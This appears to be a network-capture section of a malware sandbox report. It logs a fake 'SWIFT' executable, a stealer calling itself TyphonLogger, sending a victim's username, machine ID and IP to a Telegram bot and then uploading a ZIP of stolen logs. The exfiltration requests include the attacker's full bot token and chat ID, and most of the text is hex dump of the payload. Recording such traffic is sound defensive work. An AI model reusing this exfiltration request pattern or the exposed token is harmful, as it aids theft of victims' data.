                                                                                      2023-05-22 17:51:34 UTC766OUTGET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1
                                                                                      Host: api.telegram.org
                                                                                      Connection: Keep-Alive
                                                                                      2023-05-22 17:51:34 UTC766INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 22 May 2023 17:51:34 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 651
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2023-05-22 17:51:34 UTC767INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 38 36 39 31 32 37 30 34 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 4d 74 72 61 64 65 20 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 6d 74 72 61 64 65 64 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 38 39 30 30 32 31 37 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 4d 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 72 61 64 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 6d 74 72 61 64 65 5f 30 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 38 34 37 37 37 38 39 34 2c 22 74
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":727,"from":{"id":5869127049,"is_bot":true,"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},"date":1684777894,"t


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.549727149.154.167.220443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-05-22 17:51:45 UTC767OUTPOST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary="65055caf-f467-42d1-9569-ad240200e71b"
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 554301
                                                                                      Expect: 100-continue
                                                                                      2023-05-22 17:51:45 UTC767INHTTP/1.1 100 Continue
                                                                                      2023-05-22 17:51:45 UTC767OUTData Raw: 2d 2d 36 35 30 35 35 63 61 66 2d 66 34 36 37 2d 34 32 64 31 2d 39 35 36 39 2d 61 64 32 34 30 32 30 30 65 37 31 62 0d 0a
                                                                                      Data Ascii: --65055caf-f467-42d1-9569-ad240200e71b
                                                                                      2023-05-22 17:51:45 UTC768OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 5b 32 32 2e 30 35 2e 30 32 30 32 33 20 32 31 2e 34 32 2e 31 33 5d 3d 61 6c 66 6f 6e 73 40 31 32 38 37 35 37 5f 31 42 32 36 39 33 38 36 45 30 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 54 65 6d 70 25 35 43 25 35 42 32 32 2e 30 35 2e 30 32 30 32 33 25 32 30 32 31 2e 34 32 2e 31 33 25 35 44 25 33 44 61 6c 66 6f 6e 73 25 34 30 31 32 38
                                                                                      Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\Temp\[22.05.02023 21.42.13]=user@128757_1B269386E0.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C%5B22.05.02023%2021.42.13%5D%3Duser%40128
                                                                                      2023-05-22 17:51:45 UTC768OUTData Raw: 50 4b 03 04 14 00 00 00 08 00 50 9e b6 56 01 8f 55 0c 3c 00 00 00 4d 00 00 00 17 00 24 00 32 32 2d 30 35 2d 32 30 32 33 20 32 32 2d 34 31 2d 32 32 2e 74 78 74 0a 00 20 00 00 00 00 00 01 00 18 00 3a 03 0d 58 21 8d d9 01 3a 03 0d 58 21 8d d9 01 3a 03 0d 58 21 8d d9 01 53 56 56 56 48 ad 28 c8 c9 2f 4a 2d 52 50 06 72 34 8c 8c 74 0d 4c 75 8d 0c 8c 8c 15 0c 2d ad 4c cd ad 0c 2c 34 b9 b8 b8 40 72 c9 c5 45 c5 c5 18 aa 8c 0c ad 4c 0c ac 8c 8c 34 b9 00 50 4b 03 04 14 00 00 00 00 00 68 9e b6 56 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 24 00 42 75 69 6c 64 54 61 67 2e 74 78 74 0a 00 20 00 00 00 00 00 01 00 18 00 b8 33 bd 71 21 8d d9 01 b8 33 bd 71 21 8d d9 01 b8 33 bd 71 21 8d d9 01 50 4b 03 04 14 00 00 00 00 00 64 9e b6 56 00 00 00 00 00 00 00 00 00 00 00 00 16 00
                                                                                      Data Ascii: PKPVU<M$22-05-2023 22-41-22.txt :X!:X!:X!SVVVH(/J-RPr4tLu-L,4@rEL4PKhV$BuildTag.txt 3q!3q!3q!PKdV
                                                                                      2023-05-22 17:51:45 UTC784OUTData Raw: ca b6 fb bc 5b 6a ee c6 ff b8 75 9a b2 7e c9 71 4f 65 35 d2 b5 73 97 89 f2 22 32 59 46 97 61 bd f4 c6 e6 c7 45 b3 ba 64 ca da 91 b0 49 d9 a1 d5 ea 69 61 7c e1 1b 3e d3 1b 36 e0 b8 27 83 94 1b 8e 84 82 ef 00 22 24 a9 7f db 73 62 bf 7c d2 dd 27 bd 5d 59 17 c8 a0 0b e1 32 89 d7 9d a5 bc 29 b2 86 7c 99 e9 58 d9 c6 55 87 7d 51 ab 2c 5d 3a f6 ce f6 b5 96 8a 91 3b 25 78 02 b9 9d bd ef 47 05 a6 7a 82 57 6f 07 7f 4c 5a fd 9b d2 c8 a5 02 93 8b 3a a5 e8 f5 df d9 3b a2 3a 83 7e d1 e0 ce 86 09 2a d0 26 e6 81 b8 63 2f bd c2 f9 66 22 f5 61 4a ac 31 e9 97 b6 81 0e fd 21 96 f5 52 cb 7e d2 c2 c7 dc 3a a1 8e 27 8d 56 8d 6d 06 b9 e3 1e 58 f3 9e e2 02 30 b6 95 70 7a b9 2e 21 14 01 99 13 48 1a 80 2c 98 14 21 40 58 28 08 44 36 28 59 30 ff 24 99 39 39 b6 97 3b 11 8d a0 2d 0a a0
                                                                                      Data Ascii: [ju~qOe5s"2YFaEdIia|>6'"$sb|']Y2)|XU}Q,]:;%xGzWoLZ:;:~*&c/f"aJ1!R~:'VmX0pz.!H,!@X(D6(Y0$99;-
                                                                                      2023-05-22 17:51:45 UTC800OUTData Raw: 87 a8 b1 6f b4 28 7d 1e 16 13 75 fe 2e 9b b8 ac 6a c2 e0 47 91 ef a7 70 21 63 0d ef 31 39 b8 ed 7b c9 d6 5a b5 91 c4 99 9c 68 84 6e 30 91 ce 7f 17 d5 61 8c a6 cd b0 07 75 42 6a d0 8f 1b f2 4d 98 b5 d1 7e e6 8f 41 24 19 b2 2d 18 49 06 18 3e 86 26 5b ba 02 25 43 9b 3f 0b 27 e9 60 7c d7 5e c3 87 58 2a 83 db 10 6f 85 83 de 4e bc 99 3b 6f 95 15 56 4d 62 fe c0 de 36 fa f3 dd 05 4b b6 72 c0 07 e0 2e 3d 4d 25 d2 83 cb af 2f 7c ee 75 4a 60 de 08 fa 53 d9 75 f9 32 96 4c 9e 28 fd 7e 97 bc 58 d5 ac b5 b0 6d f9 81 4e 22 89 f4 d8 2f 83 21 7d c4 3e dc 6e db 0a 9a ab b8 f6 c9 f3 34 12 ad 98 5a 51 34 6f 29 1f bd 67 f7 8d ea 57 99 75 a1 d1 d8 23 ec 3b f8 ab 8a cc af ec 34 13 5f f5 ee ea d1 01 bc 74 f7 e2 cd 7f f1 44 6a 7e 7e ef f5 24 4f d5 f9 df cb b9 ec d5 16 13 b8 d1 a9
                                                                                      Data Ascii: o(}u.jGp!c19{Zhn0auBjM~A$-I>&[%C?'`|^X*oN;oVMb6Kr.=M%/|uJ`Su2L(~XmN"/!}>n4ZQ4o)gWu#;4_tDj~~$O
                                                                                      2023-05-22 17:51:45 UTC816OUTData Raw: 88 82 61 f1 6b ef 12 a8 d7 de ec ae 4c 6b 5b 9c d6 5e 16 68 9e 68 88 37 66 9c e6 33 ee b9 85 af a8 75 af fb 63 bc 27 be a0 fd 5b 14 02 36 41 51 5e 73 a2 da 09 ba 48 b4 11 23 96 77 04 3b d2 18 69 94 54 42 80 81 d0 14 94 0e 63 f9 90 09 69 4c 70 40 df 60 26 c6 dd 1e 08 ce 71 af 3a e7 bb da a2 bb 8a 42 8d ca 56 7a 6c 18 f5 ed c6 64 51 1a 93 e7 d2 67 b7 f5 69 52 e7 e8 a0 ad 7e 7c 7e b0 ed c7 c7 9f 72 cb 0e 14 76 6d f3 ae 73 ed 66 fd a4 83 86 ad 69 fe 9d 8f 87 39 f0 98 b9 45 9c d3 d8 93 ba c0 3a 6d f7 46 16 5a 90 ed d5 04 cf d2 35 8b c3 50 7b ae fd 5b 32 05 37 ed 6e fc 59 49 4e b8 d1 86 17 2b c9 6c 15 85 bc 52 1e f0 15 33 f4 38 09 07 4b 9b 08 b6 74 6a 62 58 b5 21 d9 be 23 3e 3b e4 9d 32 70 20 8f 54 b2 20 ec 47 19 d8 df d8 3d 90 4c b8 41 2e ff 50 ee 56 2f 29 04
                                                                                      Data Ascii: akLk[^hh7f3uc'[6AQ^sH#w;iTBciLp@`&q:BVzldQgiR~|~rvmsfi9E:mFZ5P{[27nYIN+lR38KtjbX!#>;2p T G=LA.PV/)
                                                                                      2023-05-22 17:51:45 UTC832OUTData Raw: 91 fe e6 bc b7 21 1c 35 1e 83 44 8a 7f d7 1f b8 1e 83 f4 d9 d7 0e 37 b5 bb f3 a4 7a 22 78 cd 2e 19 49 be 09 fe 39 53 25 73 55 38 9a 76 16 7b 4b 01 3e 7c a0 af 58 80 c3 60 ec 9f 47 a0 27 be dc 82 fb a9 99 1e 39 0e ea f5 27 8b 59 73 0e e8 9e 10 2c 99 ff 03 39 ff b6 2d b0 2d 11 c6 10 e4 e5 c7 41 e0 4e 1c 9e b6 4c af 38 c7 73 5a 38 c0 a0 8f 35 d5 01 bd 74 4a b3 62 83 3a 3e 3d 56 bc 10 9d 4d 3f 5f 5e 13 d1 bf a0 3c b2 e0 d2 56 e5 75 49 af a3 68 50 df b5 ae 97 f4 e1 51 f6 3d fb ac 9c 95 3f f7 2e 1b 1f 4e 89 a9 37 15 be 2a 4e 4c dc a9 be 49 86 3e 38 e4 b9 f8 ab bd f7 35 ee cf 75 7b d9 a4 67 a2 9d ee 1a f7 24 3e 9e d4 ee 1c 35 6d 70 da 3a 0c 92 a0 78 46 2c 47 fc 51 68 ef f6 98 42 b7 23 50 8e 09 22 13 f1 f8 7c 00 a4 69 b9 78 ec 1d 49 55 7a a1 7c e6 2b 18 66 96 d4
                                                                                      Data Ascii: !5D7z"x.I9S%sU8v{K>|X`G'9'Ys,9--ANL8sZ85tJb:>=VM?_^<VuIhPQ=?.N7*NLI>85u{g$>5mp:xF,GQhB#P"|ixIUz|+f
                                                                                      2023-05-22 17:51:45 UTC848OUTData Raw: 43 a0 7b 04 d4 f6 bb 51 df d8 4b 4b 53 23 73 4d 5e 9c e2 fb 31 49 fe 71 98 b0 41 91 bc c5 9d af 2d 7f 71 3f 39 18 e1 ed fe a1 53 80 e0 b1 93 e6 1e 79 53 ed e6 b7 c5 bb c3 01 aa ac 6a b5 53 11 0c e2 11 e3 b9 b4 bc 76 8f f4 df 0c 2b 51 c7 9c 48 56 51 5d a5 5a 12 d0 1f 27 bb b2 25 9f ff 0e 6e 60 b7 af 7f aa d2 94 1e 5d 7a dd 6c 7a 80 d7 fc c1 8f 79 e6 f2 e8 6f f7 1e 4f e6 f9 94 f2 4a c8 50 bb cc eb 59 14 3f 35 6c 12 1c 91 6e 23 2f 6a e8 97 83 3f b6 0a 4f 0a d6 44 02 8f d4 c7 5b f8 f4 cf 9e b3 9f 39 6b 95 c4 c6 9b c4 a9 e2 ac ce e0 f6 e0 8b 84 04 30 f1 f6 ce 32 9a f1 5e cb e3 8e af bb 8b 41 2f 92 a6 3c 1e 56 4d 15 a9 71 bd bc 92 d3 9c db a5 45 75 7f 79 33 71 3f b5 37 17 96 c3 df c4 e5 16 fe f3 e6 ab 21 f3 53 1d cf 8f 37 06 36 b3 06 1b d4 74 2e 96 48 29 d9 7a
                                                                                      Data Ascii: C{QKKS#sM^1IqA-q?9SySjSv+QHVQ]Z'%n`]zlzyoOJPY?5ln#/j?OD[9k02^A/<VMqEuy3q?7!S76t.H)z
                                                                                      2023-05-22 17:51:45 UTC864OUTData Raw: ed d3 1c 76 b3 8a 3c 9c 1e c2 d2 75 9f c6 20 44 bb be 69 95 d9 bd 19 c0 dd 0e 3a d1 c8 43 66 7e 7a 55 4c b6 cf d9 ee 45 88 b2 4f d9 aa d8 ce d9 5f f3 53 5e 7c c4 a3 d8 f1 da c1 e0 4b 5c c7 99 1e 3f b2 09 78 ea 63 5b bf 58 94 5c cf 2a 35 b8 be c8 55 3f 44 17 33 6b d7 f5 64 5f 7c 21 80 51 f1 76 64 95 0f 41 99 62 70 12 bb f0 3e 6b f2 d9 d9 33 ab bc f6 aa e5 6e f1 af 99 db 5f 12 aa a5 47 1c f9 7f 0c 89 e5 bf 9d b9 ef 7e b7 e7 fe e6 93 b5 f9 3e 97 67 e2 26 a1 f6 41 6e db 23 32 85 18 a4 31 15 b8 14 73 2e ea b0 80 d2 4a 41 06 6e bf 36 5b cb 5a 23 3c 78 fa a8 f8 1f 1f f1 d6 01 cf 29 45 a1 db 3a 7c a3 b8 f3 70 06 1e 05 fd 1e db 8c 7b 2c d2 2b a5 d2 4d f5 6b 1c 31 fb b5 5c d3 ee bd 25 6a d8 c3 b3 a2 e9 a7 db b9 6f af ca f1 8e aa 24 e5 12 e4 3f 9c 0d 41 42 f3 73 5c
                                                                                      Data Ascii: v<u Di:Cf~zULEO_S^|K\?xc[X\*5U?D3kd_|!QvdAbp>k3n_G~>g&An#21s.JAn6[Z#<x)E:|p{,+Mk1\%jo$?ABs\
                                                                                      2023-05-22 17:51:45 UTC880OUTData Raw: f0 bd be 50 a7 f4 8a ed c7 c3 23 8a 26 ee c8 ae 21 ec 6a 6c 5a f3 ab 4b c0 02 93 3e 75 48 18 5f af 40 bf de c5 93 3f 10 1f 96 d8 b7 8c ad 33 0f a9 37 66 2a 12 1a 03 54 f9 8f a7 91 31 0e 57 b7 ba ae 93 ef d5 e4 1f 51 64 f9 04 3c 47 49 d6 8a cf ca d7 89 f0 0e 70 f7 1b 54 b0 12 54 20 f7 92 9b e9 89 ec 55 3c 77 52 c3 ee 5a 92 55 33 f2 24 7b 3d 90 0e d2 aa 78 6e 6e cf ff 39 35 b5 43 f9 96 dd bd 32 57 ad a5 b2 1f bc 73 3b 87 e5 f1 28 86 5a 10 e3 0f db 47 74 fc 2d 4e 0d 43 1e 21 4c 4f ba 25 87 70 f1 53 5f 2f 72 bb 35 85 ad bc 02 5e be df b8 04 54 16 a9 7a c7 22 ed 6e 85 cf 1b 7b c7 31 3f cf 74 b1 15 e0 c8 68 4e 61 0a b7 d2 94 a6 d1 ba b6 cf c6 2f 3f a5 25 a6 7d 0f 2d c8 13 f7 77 55 c0 d7 a5 32 e6 58 53 2b f8 7b 9d 42 01 52 0e c1 e7 76 da 72 05 33 36 e8 9f c1 6c
                                                                                      Data Ascii: P#&!jlZK>uH_@?37f*T1WQd<GIpTT U<wRZU3${=xnn95C2Ws;(ZGt-NC!LO%pS_/r5^Tz"n{1?thNa/?%}-wU2XS+{BRvr36l
                                                                                      2023-05-22 17:51:45 UTC896OUTData Raw: 82 db a8 a5 80 da bb 2f 52 5d c7 6e 71 fb 46 25 77 eb de 24 2e 60 2b 24 cc a9 75 0a 27 54 b5 dd 22 88 1f 3e f9 ae 47 8d 08 fc 59 53 3e 6a 8a 5f 79 e6 87 63 5d c2 76 be cb 25 7f cd 74 c6 39 43 5d 20 12 3b 61 4e 7e d4 5d 80 cc d5 4d 05 79 51 26 3f 75 59 84 ff fc d1 c8 5e 9e b6 95 32 7e 92 6b bc aa 89 ed c5 c1 10 a1 f4 de d0 ef 91 c4 5b 6f 36 2d f6 0f fa 93 cb 71 02 05 c9 e2 52 64 b2 d3 75 78 78 9a 7d 96 80 f8 7b 7f 09 1f fe ca a0 ce 7b bb 23 f8 4e 7c 5d e1 7e 68 ea de d0 59 ae b4 23 e9 79 b3 1e b0 45 c5 59 42 5c f5 33 bd f6 cd 06 e8 8b 16 d9 a4 d0 e2 f0 e8 17 e2 ef b5 6e 4e ad 8c 47 bd 21 c3 e3 71 01 cd f7 b1 ca d5 8b 7e e7 56 2f 9f e5 1f cb d5 95 4b ff 64 00 92 dc 67 72 ac 23 24 d7 1d aa dd f1 22 9d 69 be 32 ea 95 fe 89 04 12 79 5b 20 c6 7c 37 49 78 2e ef
                                                                                      Data Ascii: /R]nqF%w$.`+$u'T">GYS>j_yc]v%t9C] ;aN~]MyQ&?uY^2~k[o6-qRduxx}{{#N|]~hY#yEYB\3nNG!q~V/Kdgr#$"i2y[ |7Ix.
                                                                                      2023-05-22 17:51:45 UTC912OUTData Raw: 8a 58 8e 32 fd 51 68 53 06 ae 36 fd e3 46 33 ff 5b 9e 40 0d b2 e7 08 52 03 cb 6a 8e e3 a1 fa 8a 46 b8 01 24 2c 11 4e 96 44 2b 98 e0 1e af d8 8c 28 06 8e 04 d8 bd be 6e de eb 8c 13 7e b6 7d 0c aa 8e cf 50 ed 5a 7c a5 1d eb a9 3f b7 7c c3 ad 35 df 86 e2 de d2 fa fa 85 52 10 f5 e6 d7 a7 28 ff 8e 8b 77 17 94 18 8e cc e5 7f 04 fa 77 7d 0c 89 82 87 20 1f 67 bc da 3c 7a bd 31 96 38 19 a8 76 4b a6 57 2d 30 c7 df 35 89 67 c1 d3 f3 52 c5 af 9a 91 35 87 e0 90 73 8a c8 9b 03 5d d2 ae 93 5a b7 4d f8 fd 06 ad 3d c7 ed 0a b7 7a 52 d1 a8 c4 ec 4f 63 7f 74 c3 04 c6 f0 75 e2 cf 9e de 19 58 3e b7 7a 67 80 f3 72 e7 9e 83 36 fc 8a 7b dc aa d0 d6 4e 7e b3 da 54 ce 43 7f 4f 81 be 94 40 d8 84 0c c2 07 7d 46 79 56 32 71 4d ee 56 a9 7c 96 cb 20 b9 38 35 b0 4f 9e bc 5c 27 30 f9 75
                                                                                      Data Ascii: X2QhS6F3[@RjF$,ND+(n~}PZ|?|5R(ww} g<z18vKW-05gR5s]ZM=zROctuX>zgr6{N~TCO@}FyV2qMV| 85O\'0u
                                                                                      2023-05-22 17:51:45 UTC928OUTData Raw: 3c 7b b6 e2 51 15 fc 66 c3 fa ab ab 5c 4f 9a 7e a5 07 dd c9 68 69 1d ae 2c b4 c6 61 26 25 eb aa d5 51 5b c5 76 d4 c1 eb fb 27 d7 d4 63 ef b5 30 20 bf 8a 50 09 85 05 ae 46 0a 7f de 58 34 31 54 1b 89 52 4f d0 7c d7 7d ee 46 ce e7 cf 0b 6d 56 87 40 f0 f8 a3 4d cd 42 ff 3a c9 83 7b 6d 3c 6d bb 8a 4b 0d c2 95 f6 23 d5 2b 95 2b 4b fa 3b bf ea d5 6d 41 38 39 ea f9 a4 f3 56 fc a3 f6 e9 9f f7 c9 63 27 cf ad 02 2e 9d bd d5 5e c1 02 9a c5 11 fc af 08 f6 87 c0 35 2d 94 8d 9f 4e 59 13 1c a6 7d 4f 4b af fb 13 e3 8a 47 b0 83 ec f9 59 ac ef 27 ce 4e 01 ee 83 ef ea 6a f7 7e 4e 5d f1 1c 52 3e 53 94 a7 30 16 b4 51 10 33 0b d7 c8 72 a5 e5 c6 fa 69 e6 ac d7 6c dd 24 0c da be f0 1f 97 e8 e0 5c 4b ba 20 87 7e 61 6e fd 10 9c 47 b9 81 7d fe d4 90 86 4f a7 3b d6 9f b2 d7 4b de fa
                                                                                      Data Ascii: <{Qf\O~hi,a&%Q[v'c0 PFX41TRO|}FmV@MB:{m<mK#++K;mA89Vc'.^5-NY}OKGY'Nj~N]R>S0Q3ril$\K ~anG}O;K
                                                                                      2023-05-22 17:51:45 UTC943OUTData Raw: 10 20 b1 3a a7 1b 46 5b d8 e5 c3 0d 4a 0a 3d 5d e6 bf 8b 08 89 10 56 24 0e 5a 40 87 a0 8f de 00 68 ab 9a fe 4a 78 26 45 19 45 38 68 13 fe ae 3e e4 84 58 40 41 26 a3 55 15 a3 8c 60 ae dc 24 da 22 ad 54 34 aa 03 d2 04 f1 25 1e 54 12 a1 75 43 40 7d 62 f1 08 54 d9 f7 40 a6 bd a3 ca 76 07 ad 00 ba 05 08 a9 47 aa 67 2c 9e 70 45 09 af 57 40 e9 4e 7d 1c 56 58 ec 6d 41 b8 f9 a2 46 91 cf 49 98 2d 14 cd 80 3c f4 a2 fa a5 e6 c7 82 54 8f 3f 72 ba 7d df fa 2e c2 ed 8d 5e 5e bd 6a 0a 35 74 ab fd 40 fc 5a 90 22 25 4e 0a 32 59 83 21 2e 9d 2c 2a 38 7a 63 32 e5 8d 73 e0 79 6b b2 a2 d1 15 a9 74 f4 63 37 bb 12 ae 34 5a c9 58 24 06 20 0b 12 67 40 3e a3 a7 33 80 79 21 e0 76 30 57 22 99 1e 80 35 58 30 69 f3 9f af d4 80 e4 80 6c 27 d2 fb 8a b6 e2 84 b6 7c cd ee 1f 46 39 48 78 81
                                                                                      Data Ascii: :F[J=]V$Z@hJx&EE8h>X@A&U`$"T4%TuC@}bT@vGg,pEW@N}VXmAFI-<T?r}.^^j5t@Z"%N2Y!.,*8zc2syktc74ZX$ g@>3y!v0W"5X0il'|F9Hx
                                                                                      2023-05-22 17:51:45 UTC959OUTData Raw: 90 1e f9 b2 7c db b9 7c 66 aa 6f b5 8f 55 46 30 77 de cb b9 46 e3 6f e6 6b db f2 eb f7 7b 38 4b e0 22 0a 7b 1a 2f e2 cc e6 b5 9c ef 13 62 23 3b e8 6a 52 a0 72 77 ed 5f 0e 60 a6 68 8a 1e 7d ac 3f e3 f8 2b 86 29 ea ff fd 5b 53 07 84 ad af 8a 24 18 fc 27 00 5f 54 4c 09 4c 21 a4 04 83 d5 79 85 00 a4 94 61 46 28 d0 36 44 5d a4 01 11 26 95 c2 72 0d b4 09 65 5b 27 10 46 88 3e d9 fc 59 34 5a 17 1e a2 43 01 fe 46 b1 84 46 68 2b 73 62 93 d0 ca 40 02 a9 ef 04 4c 19 9b 71 13 a2 4d ea b4 22 ae ad 7e 5d b5 46 79 53 b9 40 52 59 16 ed e2 00 bc 63 83 44 fe d7 41 86 5c 04 48 0a d5 d3 91 5a f4 38 e8 22 94 0b 71 f9 aa 61 b2 18 f0 e4 63 c6 14 04 52 1d 26 e8 45 fc 25 d7 61 a4 84 1e 8c 3b 4c 9e 9d 5f 54 9f 41 2b 4d 1e be ab 47 91 62 94 20 9b e2 85 1f 0b d5 bb fe 1a d9 36 e1 b9
                                                                                      Data Ascii: ||foUF0wFok{8K"{/b#;jRrw_`h}?+)[S$'_TLL!yaF(6D]&re['F>Y4ZCFFh+sb@LqM"~]FyS@RYcDA\HZ8"qacR&E%a;L_TA+MGb 6
                                                                                      2023-05-22 17:51:45 UTC975OUTData Raw: 48 0d 58 dd e5 d9 f2 0f 71 58 cf db 24 b3 a0 10 b4 0a bf 79 8b da c6 d5 8a cf 43 c4 b4 25 0c 13 99 c5 26 f6 6c ab d0 bc 31 60 6d 8a 28 6e 04 90 25 ce 2f c7 0b ba 88 f8 08 25 95 36 89 96 89 6d 36 8e fa a3 b9 27 10 17 18 cb f0 4f cb 28 33 59 91 a9 ad 10 30 08 a6 d8 0d 2b 49 6a cf 83 c1 70 c5 60 d8 40 bf 05 cf b5 e7 24 3e 22 64 c1 3d 89 54 42 70 d7 eb 27 b0 61 4f 56 ea 09 e9 08 52 30 4f b0 2e a7 30 be 68 26 b3 2e b8 9d ad 80 4d b8 a2 79 a7 14 f4 f9 0a 94 d4 c9 9c 4f 70 71 01 3b f8 19 c0 7e cf a7 88 42 c6 95 8c cd 79 8c 32 c4 20 59 e4 64 86 29 26 91 3a e5 61 e1 e1 98 68 10 ba 4f 0a 12 93 af 33 4d e5 86 56 40 30 1e ba ef ab 8c 62 3e 35 5d 26 49 10 e2 08 7c 62 ac 46 ac 97 ac c2 2d 23 08 d2 56 65 4c 16 3c 25 4a ae f1 10 4b e9 58 c6 9a 79 13 4b 0d fa b4 3c 0c c7
                                                                                      Data Ascii: HXqX$yC%&l1`m(n%/%6m6'O(3Y0+Ijp`@$>"d=TBp'aOVR0O.0h&.MyOpq;~By2 Yd)&:ahO3MV@0b>5]&I|bF-#VeL<%JKXyK<
                                                                                      2023-05-22 17:51:45 UTC991OUTData Raw: aa 12 a5 e1 85 37 be e4 0b bc 4c 1e 4d 83 2b 9a 42 a6 f7 c6 3b 97 4c 7e 81 1b 58 65 f4 af 96 20 8c 42 ef 40 45 88 a5 30 90 b5 34 b1 84 31 3b 7f 8a 5e b2 86 9e 7e 46 ef 76 c1 4a df 1d 63 a2 07 bd 0e 9b 89 99 6e 09 cb 4e 09 85 32 17 79 0e 2b 5d c2 48 2f 22 f0 14 02 a7 27 32 40 20 70 10 54 1a 80 13 1d 28 98 7e 76 19 31 15 ad c3 4c 3f 32 16 5c c2 8c cf 10 4d a4 72 c7 21 b1 ee 4b ca ee 80 40 7d 8c 75 f7 20 f3 72 c7 2b 18 c2 8d 70 90 49 7b f1 49 4d 8f af 16 f8 84 d8 38 6f 82 64 3a 36 88 cb 1d 18 9c 19 dc 90 19 54 c6 48 c1 7a 31 a6 72 10 70 0a 70 f5 a7 28 6b b4 34 59 9e 83 0c ce 64 75 79 3e 0b bc c2 12 3d 7a 9a 1c f9 aa 10 0e 52 32 cc 2e 7f 3d 00 0a e3 43 79 e8 e2 00 a9 ed c2 db 01 95 00 f7 00 da 18 07 f1 60 f0 37 65 97 80 aa 3f 45 98 59 b0 64 f2 53 b9 96 50 3e
                                                                                      Data Ascii: 7LM+B;L~Xe B@E041;^~FvJcnN2y+]H/"'2@ pT(~v1L?2\Mr!K@}u r+pI{IM8od:6THz1rpp(k4Yduy>=zR2.=Cy`7e?EYdSP>
                                                                                      2023-05-22 17:51:45 UTC1007OUTData Raw: 61 50 54 02 20 c4 03 74 48 49 33 12 08 83 92 42 50 f6 4c 5b 6d 04 c4 65 e0 25 d1 a4 34 10 78 a1 fc 0b 32 96 bf bf a0 40 f3 58 da 10 3f 78 8c 18 16 02 ff b8 2d 9a 52 a1 d6 cc fc 8b bc 38 c7 9a 42 71 ed 7e 45 0d 31 0f b1 1b 55 c4 15 be 72 2a 84 ab 4e 5c f6 d6 af df 4f 45 a8 6e 34 e7 cd 81 30 30 e1 5f c5 71 05 fe 8f e7 78 14 0f ea af db 0f 58 97 33 5d 1e 1a 7b d7 04 7b 3f 3e e4 d8 98 45 bd cc a0 1c 15 80 e8 34 ae 51 bf f0 fd 5e 4c f3 66 36 2e 70 ea 75 a8 6a a1 b2 73 61 0e cf b3 71 cf 43 e0 a1 7c 6d ab 0b f8 8b 28 3e 11 1d f0 2b d4 81 82 04 66 ce ae 45 ff a2 bc 91 b1 6d bd fb a5 15 dc 0f dc 9b 4f 9b 56 79 00 f8 c2 29 15 06 f3 d6 ae 3c 31 57 22 a1 da 78 bd 92 96 ae db ac 4b 68 dc 4c ba d4 8a ea 31 c3 f6 4b 91 d3 81 0a db a5 82 8e 64 57 c2 4b 57 b8 cb 6c 1d ec
                                                                                      Data Ascii: aPT tHI3BPL[me%4x2@X?x-R8Bq~E1Ur*N\OEn400_qxX3]{{?>E4Q^Lf6.pujsaqC|m(>+fEmOVy)<1W"xKhL1KdWKWl
